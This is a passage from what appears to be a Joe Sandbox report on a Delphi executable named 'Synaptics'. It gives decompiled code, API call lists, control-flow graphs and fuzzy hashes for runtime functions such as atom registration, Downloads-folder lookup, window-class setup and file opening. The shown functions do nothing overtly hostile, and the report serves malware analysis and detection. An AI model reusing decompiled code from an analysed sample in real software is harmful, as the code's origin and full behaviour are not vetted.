				 *0x49eb24 = _t27;
				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x22b12ac
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x22b12ac
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				E00445F34();
				 *0x49eb18 = E00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                                                                                                                                                          0x00446339
                                                                                                                                                                                          0x0044633c
                                                                                                                                                                                          0x00446341
                                                                                                                                                                                          0x00446342
                                                                                                                                                                                          0x00446347
                                                                                                                                                                                          0x0044634a
                                                                                                                                                                                          0x00446356
                                                                                                                                                                                          0x00446359
                                                                                                                                                                                          0x00446367
                                                                                                                                                                                          0x00446374
                                                                                                                                                                                          0x00446379
                                                                                                                                                                                          0x00446384
                                                                                                                                                                                          0x00446389
                                                                                                                                                                                          0x00446393
                                                                                                                                                                                          0x00446398
                                                                                                                                                                                          0x0044639b
                                                                                                                                                                                          0x004463a4
                                                                                                                                                                                          0x004463a7
                                                                                                                                                                                          0x004463b8
                                                                                                                                                                                          0x004463c5
                                                                                                                                                                                          0x004463ca
                                                                                                                                                                                          0x004463da
                                                                                                                                                                                          0x004463e0
                                                                                                                                                                                          0x004463f0
                                                                                                                                                                                          0x00446401
                                                                                                                                                                                          0x00446406
                                                                                                                                                                                          0x00446417
                                                                                                                                                                                          0x00446425
                                                                                                                                                                                          0x0044642a
                                                                                                                                                                                          0x00446430
                                                                                                                                                                                          0x0044643b
                                                                                                                                                                                          0x00446440
                                                                                                                                                                                          0x00446446
                                                                                                                                                                                          0x00446448
                                                                                                                                                                                          0x00446451
                                                                                                                                                                                          0x00446460
                                                                                                                                                                                          0x00446465
                                                                                                                                                                                          0x00446474
                                                                                                                                                                                          0x00446478
                                                                                                                                                                                          0x00446485
                                                                                                                                                                                          0x00446485
                                                                                                                                                                                          0x0044648c
                                                                                                                                                                                          0x0044648f
                                                                                                                                                                                          0x00446492
                                                                                                                                                                                          0x0044649a
                                                                                                                                                                                          0x004464a7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                            • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                            • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                            • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                            • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                            • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                            • Part of subcall function 00457FC8: GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                            • Part of subcall function 00457FC8: 73CCAC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                            • Part of subcall function 00457FC8: 73CCAD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                            • Part of subcall function 00457FC8: 73CCB380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                            • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                            • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                            • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                            • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                                                                                                                          • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                          • API String ID: 2159221912-974380857
                                                                                                                                                                                          • Opcode ID: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                          • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004730FC Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v273;
				char _v280;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				signed int _t29;
				int _t59;
				int _t63;
				intOrPtr* _t81;
				signed int _t84;
				int _t91;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr _t112;

				_t91 = __edx;
				_t29 = __eax;
				_t110 = _t111;
				_t112 = _t111 + 0xfffffed0;
				_v308 = 0;
				_v304 = 0;
				_v300 = 0;
				_v280 = 0;
				_t81 = __edx;
				_push(_t110);
				_push(0x473306);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t112;
				_t84 = __eax;
				if(__eax > 6) {
					L8:
					if(_t29 != 7) {
						_t23 =  &_v8; // 0x476337
						SHGetSpecialFolderLocation(0, _t91, _t23); // executed
						_t25 =  &_v8; // 0x476337
						SHGetPathFromIDList( *_t25,  &_v273); // executed
						E0040A174( &_v273, _t81);
					} else {
						_push(_t110);
						_push(0x4732a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E00472EF0( &_v280, _t81, _t84, 0);
						E00404DCC(_v280, 0x47331c);
						if(0 == 0) {
							_t13 =  &_v8; // 0x476337
							SHGetSpecialFolderLocation(0, 5, _t13);
							_t15 =  &_v8; // 0x476337
							SHGetPathFromIDList( *_t15,  &_v273);
							E0040A174( &_v273,  &_v300);
							E00409D30(_v300, _t81);
							E00404CCC( &_v304, "\\Downloads",  *_t81);
							_t59 = E00409A58(_v304);
							__eflags = _t59;
							if(_t59 == 0) {
								E00404CCC( &_v308, 0x473390,  *_t81);
								_t63 = E00409A58(_v308);
								__eflags = _t63;
								if(_t63 == 0) {
									E004049C0(_t81);
								} else {
									E00404C88(_t81, 0x473390);
								}
							} else {
								E00404C88(_t81, "\\Downloads");
							}
						} else {
							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
							 *_t108( &_v296, 0, 0,  &_v12); // executed
							E00404BE8(_t81, _v12);
						}
						_pop(_t100);
						 *[fs:eax] = _t100;
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(E0047330D);
					E004049E4( &_v308, 3);
					return E004049C0( &_v280);
				}
				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
					case 0:
						goto L8;
					case 1:
						_t91 = 0x1a;
						goto L8;
					case 2:
						__edx = 0x1c;
						goto L8;
					case 3:
						__edx = 0x23;
						goto L8;
					case 4:
						__edx = 0x2e;
						goto L8;
					case 5:
						__edx = 5;
						goto L8;
					case 6:
						__edx = 0;
						__eflags = 0;
						goto L8;
				}
			}























                                                                                                                                                                                          0x004730fc
                                                                                                                                                                                          0x004730fc
                                                                                                                                                                                          0x004730fd
                                                                                                                                                                                          0x004730ff
                                                                                                                                                                                          0x0047310a
                                                                                                                                                                                          0x00473110
                                                                                                                                                                                          0x00473116
                                                                                                                                                                                          0x0047311c
                                                                                                                                                                                          0x00473122
                                                                                                                                                                                          0x00473126
                                                                                                                                                                                          0x00473127
                                                                                                                                                                                          0x0047312c
                                                                                                                                                                                          0x0047312f
                                                                                                                                                                                          0x00473132
                                                                                                                                                                                          0x00473137
                                                                                                                                                                                          0x00473181
                                                                                                                                                                                          0x00473184
                                                                                                                                                                                          0x004732b4
                                                                                                                                                                                          0x004732bb
                                                                                                                                                                                          0x004732c7
                                                                                                                                                                                          0x004732cb
                                                                                                                                                                                          0x004732d8
                                                                                                                                                                                          0x0047318a
                                                                                                                                                                                          0x0047318c
                                                                                                                                                                                          0x0047318d
                                                                                                                                                                                          0x00473192
                                                                                                                                                                                          0x00473195
                                                                                                                                                                                          0x0047319e
                                                                                                                                                                                          0x004731ae
                                                                                                                                                                                          0x004731b3
                                                                                                                                                                                          0x004731fe
                                                                                                                                                                                          0x00473206
                                                                                                                                                                                          0x00473212
                                                                                                                                                                                          0x00473216
                                                                                                                                                                                          0x00473227
                                                                                                                                                                                          0x00473234
                                                                                                                                                                                          0x00473246
                                                                                                                                                                                          0x00473251
                                                                                                                                                                                          0x00473256
                                                                                                                                                                                          0x00473258
                                                                                                                                                                                          0x00473275
                                                                                                                                                                                          0x00473280
                                                                                                                                                                                          0x00473285
                                                                                                                                                                                          0x00473287
                                                                                                                                                                                          0x00473299
                                                                                                                                                                                          0x00473289
                                                                                                                                                                                          0x00473290
                                                                                                                                                                                          0x00473290
                                                                                                                                                                                          0x0047325a
                                                                                                                                                                                          0x00473261
                                                                                                                                                                                          0x00473261
                                                                                                                                                                                          0x004731b5
                                                                                                                                                                                          0x004731cc
                                                                                                                                                                                          0x004731e1
                                                                                                                                                                                          0x004731ed
                                                                                                                                                                                          0x004731f4
                                                                                                                                                                                          0x004731f4
                                                                                                                                                                                          0x004732a0
                                                                                                                                                                                          0x004732a3
                                                                                                                                                                                          0x004732a3
                                                                                                                                                                                          0x004732df
                                                                                                                                                                                          0x004732e2
                                                                                                                                                                                          0x004732e5
                                                                                                                                                                                          0x004732f5
                                                                                                                                                                                          0x00473305
                                                                                                                                                                                          0x00473305
                                                                                                                                                                                          0x00473139
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0047315c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473163
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0047316a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473171
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473178
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0047317f
                                                                                                                                                                                          0x0047317f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 004731BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,7cG,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 00473206
                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(7cG,?), ref: 00473216
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                                                                                                                                                          • String ID: 7cG$SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                                                                                                                                                          • API String ID: 2341558874-1217846894
                                                                                                                                                                                          • Opcode ID: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                          • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043E6BC Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 320 43e7f1-43e804 GetWindowLongA 307->320 321 43e7ec call 40e79c 307->321 308->309 309->307 313 43e7c8 call 40e79c 309->313 310->311 312 43e70b-43e71a call 403d78 310->312 311->303 312->311 323 43e71c-43e726 call 441704 312->323 313->307 325 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 320->325 326 43e806-43e816 GetWindowLongA 320->326 321->320 323->303 339 43e853-43e857 325->339 326->325 331 43e818-43e822 SetWindowLongA 326->331 331->325 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43e87d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00437D70;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E79C(_t94, _t95, _t109, _t111);
						}
					}
					 *0x49bc20 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E79C(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00441A14(_t111);
					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403DE8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x43e884);
					return E004049C0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x49dc4c; // 0x422f30
						E00406A70(_t86,  &_v196);
						_t95 = _v196;
						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00404378();
					} else {
						_t108 =  *0x437498; // 0x4374e4
						if(E00403D78(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00441704(_t94);
					}
					goto L7;
				}
			}




















                                                                                                                                                                                          0x0043e6bc
                                                                                                                                                                                          0x0043e6bc
                                                                                                                                                                                          0x0043e6c5
                                                                                                                                                                                          0x0043e6c9
                                                                                                                                                                                          0x0043e6cf
                                                                                                                                                                                          0x0043e6d3
                                                                                                                                                                                          0x0043e6d4
                                                                                                                                                                                          0x0043e6d9
                                                                                                                                                                                          0x0043e6dc
                                                                                                                                                                                          0x0043e6e7
                                                                                                                                                                                          0x0043e6e9
                                                                                                                                                                                          0x0043e6f3
                                                                                                                                                                                          0x0043e768
                                                                                                                                                                                          0x0043e76b
                                                                                                                                                                                          0x0043e780
                                                                                                                                                                                          0x0043e788
                                                                                                                                                                                          0x0043e78a
                                                                                                                                                                                          0x0043e78d
                                                                                                                                                                                          0x0043e79e
                                                                                                                                                                                          0x0043e7a8
                                                                                                                                                                                          0x0043e7a8
                                                                                                                                                                                          0x0043e7ad
                                                                                                                                                                                          0x0043e7b7
                                                                                                                                                                                          0x0043e7c6
                                                                                                                                                                                          0x0043e7c8
                                                                                                                                                                                          0x0043e7c8
                                                                                                                                                                                          0x0043e7c6
                                                                                                                                                                                          0x0043e7cd
                                                                                                                                                                                          0x0043e7db
                                                                                                                                                                                          0x0043e7dd
                                                                                                                                                                                          0x0043e7ea
                                                                                                                                                                                          0x0043e7ec
                                                                                                                                                                                          0x0043e7ec
                                                                                                                                                                                          0x0043e804
                                                                                                                                                                                          0x0043e822
                                                                                                                                                                                          0x0043e822
                                                                                                                                                                                          0x0043e82a
                                                                                                                                                                                          0x0043e831
                                                                                                                                                                                          0x0043e836
                                                                                                                                                                                          0x0043e84e
                                                                                                                                                                                          0x0043e853
                                                                                                                                                                                          0x0043e857
                                                                                                                                                                                          0x0043e85f
                                                                                                                                                                                          0x0043e85f
                                                                                                                                                                                          0x0043e866
                                                                                                                                                                                          0x0043e869
                                                                                                                                                                                          0x0043e86c
                                                                                                                                                                                          0x0043e87c
                                                                                                                                                                                          0x0043e6fe
                                                                                                                                                                                          0x0043e6fe
                                                                                                                                                                                          0x0043e703
                                                                                                                                                                                          0x0043e728
                                                                                                                                                                                          0x0043e72b
                                                                                                                                                                                          0x0043e731
                                                                                                                                                                                          0x0043e747
                                                                                                                                                                                          0x0043e74c
                                                                                                                                                                                          0x0043e751
                                                                                                                                                                                          0x0043e75e
                                                                                                                                                                                          0x0043e763
                                                                                                                                                                                          0x0043e70b
                                                                                                                                                                                          0x0043e70d
                                                                                                                                                                                          0x0043e71a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043e723
                                                                                                                                                                                          0x0043e723
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043e703

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                                                                          • String ID: 0/B$@$tC
                                                                                                                                                                                          • API String ID: 717780171-775952512
                                                                                                                                                                                          • Opcode ID: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                          • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6b4dee4e762a5f6d3e19aac8b5c99147156016fa7a3516e62b2d273b948d0a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 418 402d70-402d84 419 402d91-402da7 418->419 420 402d86-402d87 418->420 421 402dd0-402de2 419->421 422 402da9-402db8 420->422 423 402d89-402d8a 420->423 425 402de8-402e00 CreateFileA 421->425 426 402e9a-402eb7 421->426 424 402dc9 422->424 427 402dba-402dc4 423->427 428 402d8c 423->428 424->421 432 402e06-402e0e 425->432 433 402f0e-402f19 GetLastError 425->433 430 402eb9-402ebb 426->430 431 402ebd-402ec3 426->431 427->424 429 402ef8-402ef9 428->429 434 402ecb-402ed3 GetStdHandle 430->434 435 402ec5-402ec7 431->435 436 402ec9 431->436 437 402e14-402e22 GetFileSize 432->437 438 402ed7-402edd 432->438 433->429 434->433 440 402ed5 434->440 435->434 436->434 437->433 439 402e28-402e2d 437->439 441 402ef6 438->441 442 402edf-402ee8 GetFileType 438->442 443 402e31-402e3e SetFilePointer 439->443 444 402e2f 439->444 440->438 441->429 445 402efa-402f0c CloseHandle 442->445 446 402eea-402eed 442->446 443->433 447 402e44-402e60 ReadFile 443->447 444->443 445->429 446->441 448 402eef 446->448 447->433 449 402e66 447->449 448->441 450 402e68-402e6a 449->450 450->438 451 402e6c-402e74 450->451 452 402e76-402e77 451->452 453 402e79-402e88 SetFilePointer 451->453 452->450 453->433 454 402e8e-402e96 SetEndOfFile 453->454 454->433 455 402e98 454->455 455->438
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0); // executed
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
